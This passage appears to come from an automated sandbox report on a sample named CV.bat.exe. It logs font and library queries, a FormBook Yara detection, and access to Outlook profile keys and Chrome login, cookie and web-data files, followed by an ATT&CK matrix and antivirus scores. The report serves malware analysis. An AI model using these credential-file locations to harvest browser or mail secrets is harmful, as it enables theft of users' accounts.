Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\CV.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\chkdsk.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	612 Process Injection	1 Masquerading	1 OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	612 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	114 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Software Packing	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
CV.bat.exe	33%	ReversingLabs	ByteCode-MSIL.Spyware.Noon
CV.bat.exe	35%	Virustotal		Browse
CV.bat.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
